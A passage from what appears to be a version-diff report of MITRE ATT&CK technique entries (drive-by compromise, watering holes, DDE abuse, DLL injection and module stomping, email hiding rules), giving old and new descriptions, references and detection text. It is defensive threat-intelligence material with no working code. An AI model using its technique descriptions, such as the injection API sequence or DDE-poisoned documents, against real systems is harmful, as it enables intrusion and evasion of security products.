contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)
x_mitre_data_sources[0]File: File CreationApplication Log: Application Log Content
x_mitre_data_sources[2]Network Traffic: Network Connection CreationFile: File Creation
x_mitre_data_sources[3]Network Traffic: Network Traffic ContentNetwork Traffic: Network Connection Creation
x_mitre_data_sources[4]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_version1.31.4

[T1608.004] Stage Capabilities: Drive-by Target

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may prepare an operational environment to infectt1Adversaries may prepare an operational environment to infect
> systems that visit a website over the normal course of brow> systems that visit a website over the normal course of brow
>sing. Endpoint systems may be compromised through browsing t>sing. Endpoint systems may be compromised through browsing t
>o adversary controlled sites, as in [Drive-by Compromise](ht>o adversary controlled sites, as in [Drive-by Compromise](ht
>tps://attack.mitre.org/techniques/T1189). In such cases, the>tps://attack.mitre.org/techniques/T1189). In such cases, the
> user's web browser is typically targeted for exploitation (> user's web browser is typically targeted for exploitation (
>often not requiring any extra user interaction once landing >often not requiring any extra user interaction once landing 
>on the site), but adversaries may also set up websites for n>on the site), but adversaries may also set up websites for n
>on-exploitation behavior such as [Application Access Token](>on-exploitation behavior such as [Application Access Token](
>https://attack.mitre.org/techniques/T1550/001). Prior to [Dr>https://attack.mitre.org/techniques/T1550/001). Prior to [Dr
>ive-by Compromise](https://attack.mitre.org/techniques/T1189>ive-by Compromise](https://attack.mitre.org/techniques/T1189
>), adversaries must stage resources needed to deliver that e>), adversaries must stage resources needed to deliver that e
>xploit to users who browse to an adversary controlled site. >xploit to users who browse to an adversary controlled site. 
>Drive-by content can be staged on adversary controlled infra>Drive-by content can be staged on adversary controlled infra
>structure that has been acquired ([Acquire Infrastructure](h>structure that has been acquired ([Acquire Infrastructure](h
>ttps://attack.mitre.org/techniques/T1583)) or previously com>ttps://attack.mitre.org/techniques/T1583)) or previously com
>promised ([Compromise Infrastructure](https://attack.mitre.o>promised ([Compromise Infrastructure](https://attack.mitre.o
>rg/techniques/T1584)).  Adversaries may upload or inject mal>rg/techniques/T1584)).  Adversaries may upload or inject mal
>icious web content, such as [JavaScript](https://attack.mitr>icious web content, such as [JavaScript](https://attack.mitr
>e.org/techniques/T1059/007), into websites.(Citation: FireEy>e.org/techniques/T1059/007), into websites.(Citation: FireEy
>e CFR Watering Hole 2012)(Citation: Gallagher 2015) This may>e CFR Watering Hole 2012)(Citation: Gallagher 2015) This may
> be done in a number of ways, including inserting malicious > be done in a number of ways, including inserting malicious 
>script into web pages or other user controllable web content>script into web pages or other user controllable web content
> such as forum posts. Adversaries may also craft malicious w> such as forum posts. Adversaries may also craft malicious w
>eb advertisements and purchase ad space on a website through>eb advertisements and purchase ad space on a website through
> legitimate ad providers. In addition to staging content to > legitimate ad providers. In addition to staging content to 
>exploit a user's web browser, adversaries may also stage scr>exploit a user's web browser, adversaries may also stage scr
>ipting content to profile the user's browser (as in [Gather >ipting content to profile the user's browser (as in [Gather 
>Victim Host Information](https://attack.mitre.org/techniques>Victim Host Information](https://attack.mitre.org/techniques
>/T1592)) to ensure it is vulnerable prior to attempting expl>/T1592)) to ensure it is vulnerable prior to attempting expl
>oitation.(Citation: ATT ScanBox)  Websites compromised by an>oitation.(Citation: ATT ScanBox)  Websites compromised by an
> adversary and used to stage a drive-by may be ones visited > adversary and used to stage a drive-by may be ones visited 
>by a specific community, such as government, a particular in>by a specific community, such as government, a particular in
>dustry, or region, where the goal is to compromise a specifi>dustry, or region, where the goal is to compromise a specifi
>c user or set of users based on a shared interest. This kind>c user or set of users based on a shared interest. This kind
> of targeted attack is referred to a strategic web compromis> of targeted campaign is referred to a strategic web comprom
>e or watering hole attack.  Adversaries may purchase domains>ise or watering hole attack.  Adversaries may purchase domai
> similar to legitimate domains (ex: homoglyphs, typosquattin>ns similar to legitimate domains (ex: homoglyphs, typosquatt
>g, different top-level domain, etc.) during acquisition of i>ing, different top-level domain, etc.) during acquisition of
>nfrastructure ([Domains](https://attack.mitre.org/techniques> infrastructure ([Domains](https://attack.mitre.org/techniqu
>/T1583/001)) to help facilitate [Drive-by Compromise](https:>es/T1583/001)) to help facilitate [Drive-by Compromise](http
>//attack.mitre.org/techniques/T1189).>s://attack.mitre.org/techniques/T1189).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 16:27:38.793000+00:002022-03-08 21:59:57.082000+00:00
descriptionAdversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
x_mitre_version1.11.2

[T1559.002] Inter-Process Communication: Dynamic Data Exchange

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may use Windows Dynamic Data Exchange (DDE) to et1Adversaries may use Windows Dynamic Data Exchange (DDE) to e
>xecute arbitrary commands. DDE is a client-server protocol f>xecute arbitrary commands. DDE is a client-server protocol f
>or one-time and/or continuous inter-process communication (I>or one-time and/or continuous inter-process communication (I
>PC) between applications. Once a link is established, applic>PC) between applications. Once a link is established, applic
>ations can autonomously exchange transactions consisting of >ations can autonomously exchange transactions consisting of 
>strings, warm data links (notifications when a data item cha>strings, warm data links (notifications when a data item cha
>nges), hot data links (duplications of changes to a data ite>nges), hot data links (duplications of changes to a data ite
>m), and requests for command execution.  Object Linking and >m), and requests for command execution.  Object Linking and 
>Embedding (OLE), or the ability to link data between documen>Embedding (OLE), or the ability to link data between documen
>ts, was originally implemented through DDE. Despite being su>ts, was originally implemented through DDE. Despite being su
>perseded by [Component Object Model](https://attack.mitre.or>perseded by [Component Object Model](https://attack.mitre.or
>g/techniques/T1559/001), DDE may be enabled in Windows 10 an>g/techniques/T1559/001), DDE may be enabled in Windows 10 an
>d most of Microsoft Office 2016 via Registry keys. (Citation>d most of Microsoft Office 2016 via Registry keys.(Citation:
>: BleepingComputer DDE Disabled in Word Dec 2017) (Citation:> BleepingComputer DDE Disabled in Word Dec 2017)(Citation: M
> Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advi>icrosoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisor
>sory Nov 2017)  Microsoft Office documents can be poisoned w>y Nov 2017)  Microsoft Office documents can be poisoned with
>ith DDE commands (Citation: SensePost PS DDE May 2016) (Cita> DDE commands, directly or through embedded files, and used 
>tion: Kettle CSV DDE Aug 2014), directly or through embedded>to deliver execution via [Phishing](https://attack.mitre.org
> files (Citation: Enigma Reviving DDE Jan 2018), and used to>/techniques/T1566) campaigns or hosted Web content, avoiding
> deliver execution via [Phishing](https://attack.mitre.org/t> the use of Visual Basic for Applications (VBA) macros.(Cita
>echniques/T1566) campaigns or hosted Web content, avoiding t>tion: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Au
>he use of Visual Basic for Applications (VBA) macros. (Citat>g 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: Se
>ion: SensePost MacroLess DDE Oct 2017) DDE could also be lev>nsePost MacroLess DDE Oct 2017) Similarly, adversaries may i
>eraged by an adversary operating on a compromised machine wh>nfect payloads to execute applications and/or commands on a 
>o does not have direct access to a [Command and Scripting In>victim device by way of embedding DDE formulas within a CSV 
>terpreter](https://attack.mitre.org/techniques/T1059). DDE e>file intended to be opened through a Windows spreadsheet pro
>xecution can be invoked remotely via [Remote Services](https>gram.(Citation: OWASP CSV Injection)(Citation: CSV Excel Mac
>://attack.mitre.org/techniques/T1021) such as [Distributed C>ro Injection )  DDE could also be leveraged by an adversary 
>omponent Object Model](https://attack.mitre.org/techniques/T>operating on a compromised machine who does not have direct 
>1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)>access to a [Command and Scripting Interpreter](https://atta
 >ck.mitre.org/techniques/T1059). DDE execution can be invoked
 > remotely via [Remote Services](https://attack.mitre.org/tec
 >hniques/T1021) such as [Distributed Component Object Model](
 >https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citat
 >ion: Fireeye Hunting COM June 2019)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-07-26 22:52:04.196000+00:002022-02-22 13:22:30.191000+00:00
descriptionAdversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection ) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
external_references[8]['source_name']Fireeye Hunting COM June 2019OWASP CSV Injection
external_references[8]['description']Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019. Albinowax Timo Goosen. (n.d.). CSV Injection. Retrieved February 7, 2022.
external_references[8]['url']https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.htmlhttps://owasp.org/www-community/attacks/CSV_Injection
external_references[9]['source_name']NVisio Labs DDE Detection Oct 2017CSV Excel Macro Injection
external_references[9]['description']NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017. Ishaq Mohammed . (2021, January 10). Everything about CSV Injection and CSV Excel Macro Injection. Retrieved February 7, 2022.
external_references[9]['url']https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/
x_mitre_data_sources[0]Module: Module LoadScript: Script Execution
x_mitre_data_sources[2]Script: Script ExecutionModule: Module Load
x_mitre_detectionMonitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe). OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe). OLE, Office Open XML, CSV, and other files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Fireeye Hunting COM June 2019', 'description': 'Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.', 'url': 'https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html'}
external_references{'source_name': 'NVisio Labs DDE Detection Oct 2017', 'description': 'NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.', 'url': 'https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/'}

[T1055.001] Process Injection: Dynamic-link Library Injection

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may inject dynamic-link libraries (DLLs) into prt1Adversaries may inject dynamic-link libraries (DLLs) into pr
>ocesses in order to evade process-based defenses as well as >ocesses in order to evade process-based defenses as well as 
>possibly elevate privileges. DLL injection is a method of ex>possibly elevate privileges. DLL injection is a method of ex
>ecuting arbitrary code in the address space of a separate li>ecuting arbitrary code in the address space of a separate li
>ve process.    DLL injection is commonly performed by writin>ve process.    DLL injection is commonly performed by writin
>g the path to a DLL in the virtual address space of the targ>g the path to a DLL in the virtual address space of the targ
>et process before loading the DLL by invoking a new thread. >et process before loading the DLL by invoking a new thread. 
>The write can be performed with native Windows API calls suc>The write can be performed with native Windows API calls suc
>h as <code>VirtualAllocEx</code> and <code>WriteProcessMemor>h as <code>VirtualAllocEx</code> and <code>WriteProcessMemor
>y</code>, then invoked with <code>CreateRemoteThread</code> >y</code>, then invoked with <code>CreateRemoteThread</code> 
>(which calls the <code>LoadLibrary</code> API responsible fo>(which calls the <code>LoadLibrary</code> API responsible fo
>r loading the DLL). (Citation: Elastic Process Injection Jul>r loading the DLL). (Citation: Elastic Process Injection Jul
>y 2017)   Variations of this method such as reflective DLL i>y 2017)   Variations of this method such as reflective DLL i
>njection (writing a self-mapping DLL into a process) and mem>njection (writing a self-mapping DLL into a process) and mem
>ory module (map DLL when writing into process) overcome the >ory module (map DLL when writing into process) overcome the 
>address relocation issue as well as the additional APIs to i>address relocation issue as well as the additional APIs to i
>nvoke execution (since these methods load and execute the fi>nvoke execution (since these methods load and execute the fi
>les in memory by manually preforming the function of <code>L>les in memory by manually preforming the function of <code>L
>oadLibrary</code>).(Citation: Elastic HuntingNMemory June 20>oadLibrary</code>).(Citation: Elastic HuntingNMemory June 20
>17)(Citation: Elastic Process Injection July 2017)   Running>17)(Citation: Elastic Process Injection July 2017)   Another
> code in the context of another process may allow access to > variation of this method, often referred to as Module Stomp
>the process's memory, system/network resources, and possibly>ing/Overloading or DLL Hollowing, may be leveraged to concea
> elevated privileges. Execution via DLL injection may also e>l injected code within a process. This method involves loadi
>vade detection from security products since the execution is>ng a legitimate DLL into a remote process then manually over
> masked under a legitimate process. >writing the module's <code>AddressOfEntryPoint</code> before
 > starting a new thread in the target process.(Citation: Modu
 >le Stomping for Shellcode Injection) This variation allows a
 >ttackers to hide malicious injected code by potentially back
 >ing its execution with a legitimate DLL file on disk.(Citati
 >on: Hiding Malicious Code with Module Stomping)   Running co
 >de in the context of another process may allow access to the
 > process's memory, system/network resources, and possibly el
 >evated privileges. Execution via DLL injection may also evad
 >e detection from security products since the execution is ma
 >sked under a legitimate process. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Boominathan Sundaram']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 12:20:00.382000+00:002022-10-18 21:07:23.748000+00:00
descriptionAdversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.
external_references[1]['source_name']Elastic Process Injection July 2017Hiding Malicious Code with Module Stomping
external_references[1]['description']Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.Aliz Hammond. (2019, August 15). Hiding Malicious Code with "Module Stomping": Part 1. Retrieved July 14, 2022.
external_references[1]['url']https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-processhttps://blog.f-secure.com/hiding-malicious-code-with-module-stomping/
x_mitre_data_sources[2]Process: OS API ExecutionProcess: Process Metadata
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Elastic Process Injection July 2017', 'description': 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.', 'url': 'https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process'}
external_references{'source_name': 'Module Stomping for Shellcode Injection', 'description': 'Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.', 'url': 'https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection'}
x_mitre_data_sourcesProcess: OS API Execution

[T1564.008] Hide Artifacts: Email Hiding Rules

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 01:24:31.674000+00:002022-04-12 15:22:29.599000+00:00
external_references[1]['source_name']Microsoft Inbox RulesMacOS Email Rules
external_references[1]['description']Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.
external_references[1]['url']https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac
external_references[2]['source_name']MacOS Email RulesMicrosoft BEC Campaign
external_references[2]['description']Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.
external_references[2]['url']https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/machttps://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/
external_references[3]['source_name']Microsoft New-InboxRuleMicrosoft Inbox Rules
external_references[3]['description']Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.
external_references[3]['url']https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-pshttps://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59
external_references[4]['source_name']Microsoft Set-InboxRuleMicrosoft New-InboxRule
external_references[4]['description']Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.
external_references[4]['url']https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-pshttps://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps
external_references[5]['source_name']Microsoft Cloud App SecurityMicrosoft Set-InboxRule
external_references[5]['description']Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.
external_references[5]['url']https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps
external_references[6]['source_name']Microsoft BEC CampaignMicrosoft Cloud App Security
external_references[6]['description']Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.
external_references[6]['url']https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification
x_mitre_platformsGoogle Workspace
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification

[T1546] Event Triggered Execution

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may establish persistence and/or elevate privilet1Adversaries may establish persistence and/or elevate privile
>ges using system mechanisms that trigger execution based on >ges using system mechanisms that trigger execution based on 
>specific events. Various operating systems have means to mon>specific events. Various operating systems have means to mon
>itor and subscribe to events such as logons or other user ac>itor and subscribe to events such as logons or other user ac
>tivity such as running specific applications/binaries.   Adv>tivity such as running specific applications/binaries. Cloud
>ersaries may abuse these mechanisms as a means of maintainin> environments may also support various functions and service
>g persistent access to a victim via repeatedly executing mal>s that monitor and can be invoked in response to specific cl
>icious code. After gaining access to a victim system, advers>oud events.(Citation: Backdooring an AWS account)(Citation: 
>aries may create/modify event triggers to point to malicious>Varonis Power Automate Data Exfiltration)(Citation: Microsof
> content that will be executed whenever the event trigger is>t DART Case Report 001)  Adversaries may abuse these mechani
> invoked.(Citation: FireEye WMI 2015)(Citation: Malware Pers>sms as a means of maintaining persistent access to a victim 
>istence on OS X)(Citation: amnesia malware)  Since the execu>via repeatedly executing malicious code. After gaining acces
>tion can be proxied by an account with higher permissions, s>s to a victim system, adversaries may create/modify event tr
>uch as SYSTEM or service accounts, an adversary may be able >iggers to point to malicious content that will be executed w
>to abuse these triggered execution mechanisms to escalate th>henever the event trigger is invoked.(Citation: FireEye WMI 
>eir privileges. >2015)(Citation: Malware Persistence on OS X)(Citation: amnes
 >ia malware)  Since the execution can be proxied by an accoun
